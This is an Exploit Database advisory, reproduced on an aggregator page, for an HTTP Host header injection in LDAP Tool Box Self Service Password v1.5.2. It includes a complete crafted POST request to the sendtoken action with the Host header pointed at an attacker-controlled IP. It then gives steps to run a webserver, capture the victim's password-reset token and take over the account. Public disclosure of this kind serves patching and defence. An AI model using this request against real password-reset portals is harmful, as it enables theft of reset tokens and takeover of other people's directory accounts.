LDAP Tool Box Self Service Password v1.5.2 – Account takeover

• Exploit Database
• 13 阅读

• 作者： Tahar BENNACEF
  日期： 2023-04-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51275/

• # Exploit Title:LDAP Tool Box Self Service Password v1.5.2 -Account takeover
  # Date: 02/17/2023
  # Exploit Author: Tahar BENNACEF (aka tar.gz)
  # Software Link: https://github.com/ltb-project/self-service-password
  # Version: 1.5.2
  # Tested on: Ubuntu
  
  Self Service Password is a PHP application that allows users to change
  their password in an LDAP directory.
  It is very useful to get back an account with waiting an action from an
  administration especially in Active Directory environment
  
  The password reset feature is prone to an HTTP Host header vulnerability
  allowing an attacker to tamper the password-reset mail sent to his victim
  allowing him to potentially steal his victim's valid reset token. The
  attacker can then use it to perform account takeover
  
  
  *Step to reproduce*
  
  1. Request a password reset request targeting your victim and setting in
  the request HTTP Host header the value of a server under your control
  
  POST /?action=sendtoken HTTP/1.1
  Host: *111.111.111.111*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
  Firefox/102.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 16
  Origin: https://portal-lab.ngp.infra
  Referer: https://portal-lab.ngp.infra/?action=sendtoken
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Te: trailers
  Connection: close
  
  login=test.reset
  
  
  As the vulnerable web application's relying on the Host header of the
  password-reset request to craft the password-reset mail. The victim
  receive a mail with a tampered link
  [image: image.png]
  
  2. Start a webserver and wait for the victim to click on the link
  
  If the victim click on this tampered link, he will sent his password reset
  token to the server set in the password-reset request's HTTP Host header
  [image: image.png]
  
  3. Use the stolen token to reset victim's account password
  
  
  Best regards